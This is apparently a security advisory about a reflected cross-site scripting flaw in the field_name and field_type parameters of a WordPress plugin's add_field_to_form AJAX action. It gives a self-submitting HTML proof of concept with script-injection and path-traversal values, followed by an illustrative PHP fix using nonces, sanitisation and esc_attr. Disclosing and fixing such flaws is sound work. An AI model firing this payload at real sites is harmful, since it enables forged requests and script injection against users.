The plugin does not sanitise and escape the field_name and field_type parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues.
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" id="hack" method="POST">
<input type="hidden" name="action" value="add_field_to_form" />
<input type="hidden" name="field_name" value='xxxxxxxxxxxx"><script>alert(/XSS-field_name/)</script>' />
<input type="hidden" name="field_type" value='"><script>alert(/XSS-field_type/)</script>' />
<input type="hidden" name="list_id" value="../../../../../" />
<input type="submit" value="Submit request" />
</form>
<script>
var form1 = document.getElementById('hack');
form1.submit();
</script>
</body>
</html>
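One way a handler for the add_field_to_form action could sanitise on input and escape on output, shown as an added example and not the plugin's own code. The function name, nonce action, capability, allowed type list and output markup are assumptions; only the action name and the two parameter names come from the advisory above.

```php
<?php
// Added example: hypothetical handler, NOT the plugin's actual code.
// Registered for logged-in users only (assumption).
add_action( 'wp_ajax_add_field_to_form', 'example_add_field_to_form' );

function example_add_field_to_form() {
    // The proof of concept is an auto-submitting cross-site form, so require
    // a nonce and a capability before doing anything with the request.
    // 'example_add_field' and 'manage_options' are assumed values.
    check_ajax_referer( 'example_add_field', 'nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // Sanitise on input: undo WordPress' added slashes, then reduce each
    // value to the shape it is expected to have.
    $field_name = isset( $_POST['field_name'] )
        ? sanitize_text_field( wp_unslash( $_POST['field_name'] ) )
        : '';
    $field_type = isset( $_POST['field_type'] )
        ? sanitize_key( wp_unslash( $_POST['field_type'] ) )
        : '';

    // field_type is a closed set, so allow-list it (constructed list).
    $allowed_types = array( 'text', 'email', 'number', 'date' );
    if ( ! in_array( $field_type, $allowed_types, true ) ) {
        wp_send_json_error( 'invalid field_type', 400 );
    }

    // Escape on output: esc_attr() encodes quotes, angle brackets and
    // ampersands, so a value such as "><script>...</script> stays inside
    // the attribute as text instead of closing it and opening a new tag.
    printf(
        '<input type="%s" name="%s" />',
        esc_attr( $field_type ),
        esc_attr( $field_name )
    );

    wp_die(); // end the AJAX response cleanly
}
```

Input sanitisation alone is not the fix: esc_attr() at the point of output is what prevents the attribute break-out, and it has to be applied at every place the two values are echoed.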